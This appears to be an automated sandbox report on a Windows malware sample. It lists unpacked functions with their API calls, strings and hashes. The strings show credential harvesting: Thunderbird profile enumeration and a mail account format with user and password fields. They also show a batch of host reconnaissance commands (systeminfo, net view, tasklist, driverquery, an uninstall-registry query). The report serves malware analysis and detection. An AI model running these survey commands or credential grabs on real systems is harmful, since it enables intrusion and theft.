Instruction Fuzzy Hash: 14216D31A41118EBEF019FA9DC498EEBBBDFB44360B008526FE06D6150D7349E418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 04A02BC7, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 147timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0B94D: InterlockedIncrement.KERNEL32(00000018), ref: 04A0B99E
Part of subcall function 04A0B94D: RtlLeaveCriticalSection.NTDLL(05A98DC8), ref: 04A0BA29

OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,00000000,00000000,?,?,?,049F58D4,?,?,?,00000000), ref: 04A02C1E
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,00000000,00000000,?,?,?,049F58D4,?), ref: 04A02C3C
GetSystemTimeAsFileTime.KERNEL32(?), ref: 04A02CA4
lstrlenW.KERNEL32(?), ref: 04A02D19
GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 04A02D35
memcpy.NTDLL(00000014,?,00000002), ref: 04A02D4D

Part of subcall function 04A03947: RtlLeaveCriticalSection.NTDLL(04A170E8), ref: 04A039C4

Strings

o, xrefs: 04A02D0A

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
String ID: o
API String ID: 2541713525-252678980
Opcode ID: 30a681747e2c53f203bb38596ab1110d63b16b96963f36696bc7a5a31573b24b
Instruction ID: ccfbdda19fc4720858a491fd644bb7a0dcdd1d7f3072ccbad90965f0fd0da188
Opcode Fuzzy Hash: 30a681747e2c53f203bb38596ab1110d63b16b96963f36696bc7a5a31573b24b
Instruction Fuzzy Hash: D851A276640706AFEB20DF64E888BA6B7B8FF04704F108569EA05D71A0E774FD85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 049FA917, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000104,04A11E0D,00000000,?,?,04A03303,?,00000005,?,00000000), ref: 049FA933
lstrlen.KERNEL32(00000000,00000104,04A11E0D,00000000,?,?,04A03303,?,00000005), ref: 049FA949
lstrlen.KERNEL32(?,00000104,04A11E0D,00000000,?,?,04A03303,?,00000005), ref: 049FA95E
RtlAllocateHeap.NTDLL(00000000,00000030,00000104), ref: 049FA9B9
_snprintf.NTDLL ref: 049FA9D8
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 049FA9F7

Strings

DEVICE: %sCLASS: %sINTERFACE: %sADD: %u, xrefs: 049FA9D1

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFree_snprintf
String ID: DEVICE: %sCLASS: %sINTERFACE: %sADD: %u
API String ID: 3180502281-567302550
Opcode ID: e4754fb003b64f322ee225daadc32286e2f5a2753171c973134920b512dc9787
Instruction ID: 585ffa966a6871337300dcb106528a3e06389eb969caab711d79a142fbe99b46
Opcode Fuzzy Hash: e4754fb003b64f322ee225daadc32286e2f5a2753171c973134920b512dc9787
Instruction Fuzzy Hash: F4218C32500219FFEF01DFA8DC848AB7BAAFB44354B118035FE19A7120D735AE91DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A01889, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 04A018A7
RegQueryValueExA.ADVAPI32(?,Main,00000000,74B5F710,00000000,?,74B5F710,74B5F730), ref: 04A018CC
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A018DD
RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 04A018F8
HeapFree.KERNEL32(00000000,?), ref: 04A01918
RegCloseKey.ADVAPI32(?), ref: 04A01921

Strings

Main, xrefs: 04A018C3, 04A018C8, 04A018F4

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID: Main
API String ID: 170146033-521822810
Opcode ID: 0b22129c2f7e7fcb7b415792e20742c9ba657f96df27d02b7302419c5c87abee
Instruction ID: 15bd8ed4f0a9e1213e4dccda4f4db5566941a52fe5e20a1c04660aeb6fda4fe4
Opcode Fuzzy Hash: 0b22129c2f7e7fcb7b415792e20742c9ba657f96df27d02b7302419c5c87abee
Instruction Fuzzy Hash: 3D11B2B6900118FFEB019FE4ED84CEEBBBDEB58344B1044A6E901E2160D735AE56DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A08991, Relevance: 12.1, APIs: 8, Instructions: 121memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 049F2D2F: RegCreateKeyA.ADVAPI32(80000001,05A987E8,?), ref: 049F2D44
Part of subcall function 049F2D2F: lstrlen.KERNEL32(05A987E8,00000000,00000000,00000028,?,?,?,?,04A0F9C6,00000001,?), ref: 049F2D72

RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04A089D6
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04A089EE
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08A50
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04A08A64
WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08AB4
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08ADD
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08AED
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08AF6

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: 9e1228d3ba142b5e1421265c52b88bec3119fd66fc4ba883ab68998ab05c6fcf
Instruction ID: 9c5dc9fe2092f7195a303b806701658f744f34eb6f77f177897cad04af87ac86
Opcode Fuzzy Hash: 9e1228d3ba142b5e1421265c52b88bec3119fd66fc4ba883ab68998ab05c6fcf
Instruction Fuzzy Hash: C441C6B5C00219FFDF01AF94DC848EEBBB9FF18304F11846AE511A22A0D3396E55DB64

Uniqueness

Uniqueness Score: -1.00%

Function 04A01FB3, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,049FEBD7), ref: 04A01FC9
wsprintfA.USER32 ref: 04A01FF1
lstrlen.KERNEL32(?), ref: 04A02000

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

wsprintfA.USER32 ref: 04A02040
wsprintfA.USER32 ref: 04A02075
memcpy.NTDLL(00000000,?,?), ref: 04A02082
memcpy.NTDLL(00000008,04A133F4,00000002,00000000,?,?), ref: 04A02097
wsprintfA.USER32 ref: 04A020BA

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: 167fc14533d72ddeeaa266030b90331cf6d4b99f534fb86b9eebc9f2e0dc1cc0
Instruction ID: e21791d9db410bbc36f5ce07cb1cef611e845c17fb3c930d615a8e202b178e03
Opcode Fuzzy Hash: 167fc14533d72ddeeaa266030b90331cf6d4b99f534fb86b9eebc9f2e0dc1cc0
Instruction Fuzzy Hash: CB412176A00209AFEB11DF98DC84EAAB7FCEF48308B148465E959D7261EB34FD05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A0B21C, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,049F4370,?,?,?,?), ref: 04A0B240
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04A0B252
wcstombs.NTDLL ref: 04A0B260
lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,049F4370,?,?,?), ref: 04A0B284
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04A0B299
mbstowcs.NTDLL ref: 04A0B2A6
HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,049F4370,?,?,?,?,?), ref: 04A0B2B8
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,049F4370,?,?,?,?,?), ref: 04A0B2D2

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
Opcode ID: 671c84a3c43dded9c5900d0f49157d6fd3eef50a975b3519c33014d8fcd5e6b8
Instruction ID: 08c2d63336ca786ea072ecb10f1fd3701eef1a6d0877428821c66758e56a3528
Opcode Fuzzy Hash: 671c84a3c43dded9c5900d0f49157d6fd3eef50a975b3519c33014d8fcd5e6b8
Instruction Fuzzy Hash: 56212C71500209FBEF119FA4ED08E9E7BB9EB58311F108125F914A61A0DB79AE52DB60

Uniqueness

Uniqueness Score: -1.00%

Function 049F4F1B, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 049F4F27
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 049F4F45
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 049F4F4D
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 049F4F6B
GetLastError.KERNEL32 ref: 049F4F7F
RegCloseKey.ADVAPI32(?), ref: 049F4F8A
CloseHandle.KERNEL32(00000000), ref: 049F4F91
GetLastError.KERNEL32 ref: 049F4F99

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: d2a4539f2f09ef9343dfa9700d8aa068236967c884b4fe87d84c8fb0f6e0dce9
Instruction ID: 855d79fd1ac75c0262259bf6001daa0defbc0ce3585f281702e4a9872224c3a1
Opcode Fuzzy Hash: d2a4539f2f09ef9343dfa9700d8aa068236967c884b4fe87d84c8fb0f6e0dce9
Instruction Fuzzy Hash: 91115B79280208BFEF019FA0EC48E6A3BADEB64361F104020FE09C6260DB34ED119B21

Uniqueness

Uniqueness Score: -1.00%

Function 049F8181, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a50491b4ec0268a627b399e2f2e09e18404386a623eeebd2a2e1eab96fa969d6
Instruction ID: 3a3dfc5355b7b8edc75061d9d9a7ad49afcef853aee5c90f12aa21de861decc2
Opcode Fuzzy Hash: a50491b4ec0268a627b399e2f2e09e18404386a623eeebd2a2e1eab96fa969d6
Instruction Fuzzy Hash: 4EA10571D00209EFEF62EFE4DD48AEEBBB9EF09314F108475E611A2160D771AA55EB10

Uniqueness

Uniqueness Score: -1.00%

Function 04A0AA38, Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,049F2FFB,?,?,?,?,?), ref: 04A0AA92
lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,049F2FFB,?,?,?,?,?), ref: 04A0AAB0
RtlAllocateHeap.NTDLL(00000000,74B06985,?), ref: 04A0AADC
memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,049F2FFB,?,?,?,?,?), ref: 04A0AAF3
HeapFree.KERNEL32(00000000,00000000), ref: 04A0AB06
memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,049F2FFB,?,?,?,?,?), ref: 04A0AB15
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,049F2FFB,?,?,?), ref: 04A0AB79

Part of subcall function 04A03947: RtlLeaveCriticalSection.NTDLL(04A170E8), ref: 04A039C4

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
Opcode ID: a8a1a9d07de9c7178c55114ba8744d2b57809b6acfc75476332c1f8f75292771
Instruction ID: aa029f1ddf7008ea53d887c5d96f12b5f8c87fce38268e0f6c0d26cb0551d3e4
Opcode Fuzzy Hash: a8a1a9d07de9c7178c55114ba8744d2b57809b6acfc75476332c1f8f75292771
Instruction Fuzzy Hash: A3418F31900318BFEF229FA4ED44AAE7BB5EF25350F458125E904A61E0D774EE51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A0BA8B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(?,00000000,00000000,00000000,74B5F5B0,049FBBA1,61636F4C,00000001,?,?,?,00000000), ref: 04A0BA9B
StrChrA.SHLWAPI(00000000,00000020,?,00000000), ref: 04A0BAAC

Part of subcall function 049F5772: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,049F2C4F,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 049F577B
Part of subcall function 049F5772: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 049F579E
Part of subcall function 049F5772: memset.NTDLL ref: 049F57AD

ExitProcess.KERNEL32 ref: 04A0BBE9

Part of subcall function 04A01418: StrChrA.SHLWAPI(00000000,?,?,?,?,?,?,049F108A,?,0000002C,?), ref: 04A0143E
Part of subcall function 04A01418: StrTrimA.SHLWAPI(00000000,04A13528,00000000,?,?,?,?,049F108A,?,0000002C,?), ref: 04A0145D
Part of subcall function 04A01418: StrChrA.SHLWAPI(00000000,?,?,?,?,?,049F108A,?,0000002C,?), ref: 04A0146E
Part of subcall function 04A01418: StrTrimA.SHLWAPI(00000001,04A13528,?,?,?,?,049F108A,?,0000002C,?), ref: 04A01480

lstrcmp.KERNEL32(?,mail), ref: 04A0BB09

Part of subcall function 049FBF1E: FindFirstFileW.KERNEL32(?,?,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 049FBF9C
Part of subcall function 049FBF1E: lstrlenW.KERNEL32(?), ref: 049FBFB8
Part of subcall function 049FBF1E: lstrlenW.KERNEL32(?), ref: 049FBFD0
Part of subcall function 049FBF1E: lstrcpyW.KERNEL32(00000000,?), ref: 049FBFE9
Part of subcall function 049FBF1E: lstrcpyW.KERNEL32(00000002), ref: 049FBFFE
Part of subcall function 049FBF1E: FindNextFileW.KERNEL32(?,00000010), ref: 049FC026
Part of subcall function 049FBF1E: FindClose.KERNEL32(00000002), ref: 049FC034
Part of subcall function 049FBF1E: FreeLibrary.KERNEL32(?), ref: 049FC046

Part of subcall function 04A01BBE: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04A01BDD
Part of subcall function 04A01BBE: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 04A01C1B

Strings

mail, xrefs: 04A0BB02
/C pause dll, xrefs: 04A0BABA

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Findlstrlen$FileFreeHeapTrimlstrcpy$AllocateCloseCommandExitFirstLibraryLineNextProcesslstrcmpmemcpymemset
String ID: /C pause dll$mail
API String ID: 3668845731-3657633402
Opcode ID: 041e5762e07380da5fde0dcff06ce667160b7b9e2a91696b9d1f70e02a1925da
Instruction ID: 0ab89522a0b2e35f83cb9b56a2199146e789ff178d91aefe13f3a7446012641b
Opcode Fuzzy Hash: 041e5762e07380da5fde0dcff06ce667160b7b9e2a91696b9d1f70e02a1925da
Instruction Fuzzy Hash: 37416071604301AFE710EFA4ED8892FB7E9EB99314F00882CF555D60A4EA35F9058B62

Uniqueness

Uniqueness Score: -1.00%

Function 04A09DFC, Relevance: 10.6, APIs: 7, Instructions: 121threadstringCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 04A09E3D
GetWindowThreadProcessId.USER32(00000000,?), ref: 04A09E6B
GetWindowThreadProcessId.USER32(?,?), ref: 04A09EB0
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04A09ED8
_strupr.NTDLL ref: 04A09F03
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 04A09F10
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 04A09F25

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
String ID:
API String ID: 3831658075-0
Opcode ID: 85dd7ea99210f14fee87bb191d13be53a39a3a45c96f15e527e7688bae2a3808
Instruction ID: 0db1f0ada34fcbecc45eb57ca04e70a98fb2a007b15b586675c0b73181795be3
Opcode Fuzzy Hash: 85dd7ea99210f14fee87bb191d13be53a39a3a45c96f15e527e7688bae2a3808
Instruction Fuzzy Hash: 28414FB1D00218EFEF219FA4DD45BEFBBB8EB48701F148456F614A2191D775AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04A0118F, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,04A16000,04A11957), ref: 04A011B1
lstrlenW.KERNEL32(?,00000000,04A16000,04A11957), ref: 04A011C2
lstrlenW.KERNEL32(?,00000000,04A16000,04A11957), ref: 04A011D4
lstrlenW.KERNEL32(?,00000000,04A16000,04A11957), ref: 04A011E6
lstrlenW.KERNEL32(?,00000000,04A16000,04A11957), ref: 04A011F8
lstrlenW.KERNEL32(?,00000000,04A16000,04A11957), ref: 04A01204

Strings

type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s, xrefs: 04A01287

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen
String ID: type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
API String ID: 1659193697-1056788794
Opcode ID: 5bfaabb83a226763e07967c9f227c3e07c1f762fa4617b3574fd630d8738c6b6
Instruction ID: 88ab7b03a74f8b807dc17d889821b744c5bbba676b022b99aaecaf975313cb97
Opcode Fuzzy Hash: 5bfaabb83a226763e07967c9f227c3e07c1f762fa4617b3574fd630d8738c6b6
Instruction Fuzzy Hash: 63413AB1E0020AABDB24DFE9D880AAEB7F9BF98304B14C92DD415E7241E731E9058B50

Uniqueness

Uniqueness Score: -1.00%

Function 04A08B06, Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA299
Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC), ref: 049FA2B2
Part of subcall function 049FA287: GetCurrentThreadId.KERNEL32 ref: 049FA2BF
Part of subcall function 049FA287: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 049FA2CB
Part of subcall function 049FA287: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA2D9
Part of subcall function 049FA287: lstrcpy.KERNEL32(00000000), ref: 049FA2FB

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 04A08B4C
StrTrimA.SHLWAPI(?,20000920), ref: 04A08B6A
StrTrimA.SHLWAPI(?,0A0D0920,?,?,00000001), ref: 04A08BD3
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 04A08BF4
DeleteFileA.KERNEL32(?,00003219), ref: 04A08C16
HeapFree.KERNEL32(00000000,?), ref: 04A08C25
HeapFree.KERNEL32(00000000,?,00003219), ref: 04A08C3D

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
String ID:
API String ID: 1078934163-0
Opcode ID: fbfd1842d978043fc54aaa901ec6bd05493f40a1e60a4bb087063abd7c141419
Instruction ID: d011047627638a76ae748d56f2e142536057db314c19f4e4201622613c2b7bc2
Opcode Fuzzy Hash: fbfd1842d978043fc54aaa901ec6bd05493f40a1e60a4bb087063abd7c141419
Instruction Fuzzy Hash: 3331DD72205305AFE711EF54EC04FAA77E8EB68B50F044018FA80D71A0D76CFD068BA6

Uniqueness

Uniqueness Score: -1.00%

Function 04A0A534, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 04A0A5B6
lstrcpy.KERNEL32(00000000,grabs=), ref: 04A0A5C8
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 04A0A5D5
lstrlen.KERNEL32(grabs=,?,?,?,?,?,00000000,00000000,?), ref: 04A0A5E7
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 04A0A618

Strings

grabs=, xrefs: 04A0A5C2, 04A0A5E2

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID: grabs=
API String ID: 2734445380-3012740322
Opcode ID: f06a3cd7c7b73ebabb0c125f999830a143f8b9bc8a2e4da5cb68f437c4d3ebac
Instruction ID: 14db51ff361cb3a120f9276bba8ff075943e277ce95bfa5ad6ff950bf889d138
Opcode Fuzzy Hash: f06a3cd7c7b73ebabb0c125f999830a143f8b9bc8a2e4da5cb68f437c4d3ebac
Instruction Fuzzy Hash: 82316C72900209FFEF11DFA5DC48EAEBBB9EF54311F048424F91592250EB78EA11CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A033AC, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA299
Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC), ref: 049FA2B2
Part of subcall function 049FA287: GetCurrentThreadId.KERNEL32 ref: 049FA2BF
Part of subcall function 049FA287: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 049FA2CB
Part of subcall function 049FA287: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA2D9
Part of subcall function 049FA287: lstrcpy.KERNEL32(00000000), ref: 049FA2FB

HeapFree.KERNEL32(00000000,00000000,00002334,?,?,?,?,049F714A,?), ref: 04A03482

Strings

tasklist.exe /SVC >, xrefs: 04A0341A
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >, xrefs: 04A03446
nslookup 127.0.0.1 >, xrefs: 04A03404
systeminfo.exe , xrefs: 04A033CF
driverquery.exe >, xrefs: 04A03430
net view >, xrefs: 04A033EE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$CurrentFreeHeapNameSystemThreadlstrcpy
String ID: driverquery.exe >$net view >$nslookup 127.0.0.1 >$reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >$systeminfo.exe $tasklist.exe /SVC >
API String ID: 3485239229-3676109661
Opcode ID: 834ce64768ebd6917ae4fe41d874126f13620674a3b68dcf62959a5a0a7f2618
Instruction ID: a5284d0cf39355ae8e5ba078869a8d6d9f494411719a9e015fe5d75a5660d043
Opcode Fuzzy Hash: 834ce64768ebd6917ae4fe41d874126f13620674a3b68dcf62959a5a0a7f2618
Instruction Fuzzy Hash: C6118433D016B2779B323AE66CD5D6F959887D2F9970B8269AE506F2D09943BC0083F1

Uniqueness

Uniqueness Score: -1.00%

Function 04A08342, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(049FF545,00000000,?,?,?,?,049FF545,00000126,00000000,?,00000000), ref: 04A08372
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04A08388
memcpy.NTDLL(00000010,049FF545,00000000,?,?,049FF545,00000126,00000000), ref: 04A083BE
memcpy.NTDLL(00000010,00000000,00000126,?,?,049FF545,00000126), ref: 04A083D9
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 04A083F7
GetLastError.KERNEL32(?,?,049FF545,00000126), ref: 04A08401
HeapFree.KERNEL32(00000000,00000000,?,?,049FF545,00000126), ref: 04A08427

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID:
API String ID: 2237239663-0
Opcode ID: f01dbb156be8b2fcc23d1839cf18cb873eee9ed80a59d17ed6a4f0604dba570a
Instruction ID: e614c6756f59ddfac1b7c4f297471bf0ffc80215d8c603f17e531e599910bcb1
Opcode Fuzzy Hash: f01dbb156be8b2fcc23d1839cf18cb873eee9ed80a59d17ed6a4f0604dba570a
Instruction Fuzzy Hash: C0317135500209EFEF21DFA5EC44AAB7BB8FB44750F008429ED5592290D239AA15DB61

Uniqueness

Uniqueness Score: -1.00%

Function 049FC56F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0881F: RtlEnterCriticalSection.NTDLL(04A173A8), ref: 04A08827
Part of subcall function 04A0881F: RtlLeaveCriticalSection.NTDLL(04A173A8), ref: 04A0883C
Part of subcall function 04A0881F: InterlockedIncrement.KERNEL32(0000001C), ref: 04A08855

RtlAllocateHeap.NTDLL(00000000,?,Blocked), ref: 049FC59F
memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,049FAB0F,?,00000000), ref: 049FC5B0
lstrcmpi.KERNEL32(00000002,?), ref: 049FC5F6
memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,049FAB0F,?,00000000), ref: 049FC60A
HeapFree.KERNEL32(00000000,00000000,Blocked,00000000,?,00000000,?,?,?,?,?,?,?,049FAB0F,?,00000000), ref: 049FC649

Strings

Blocked, xrefs: 049FC578, 049FC62D

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked
API String ID: 733514052-367579676
Opcode ID: 9309783d4f3bc684041c1e32be9466071e19e8258bdebeb5e6661aab6a2e9123
Instruction ID: c2dab25a756ee86e95979cc04d290efc36a34f0d48b3d99436168c8fe64ef79b
Opcode Fuzzy Hash: 9309783d4f3bc684041c1e32be9466071e19e8258bdebeb5e6661aab6a2e9123
Instruction Fuzzy Hash: 6C21E272900219BBEF10AFA4DC84AAE7BBCFF04355F108039EA05A3250D735BE44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 049FB683, Relevance: 10.6, APIs: 7, Instructions: 82stringfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 049FB69B
lstrcmpiW.KERNEL32(00000000,0065002E,?,?,?,?,?,049F8CA5), ref: 049FB6D2
lstrcmpiW.KERNEL32(?,0064002E,?,?,?,?,?,049F8CA5), ref: 049FB6E7
lstrlenW.KERNEL32(?,?,?,?,?,?,049F8CA5), ref: 049FB6EE
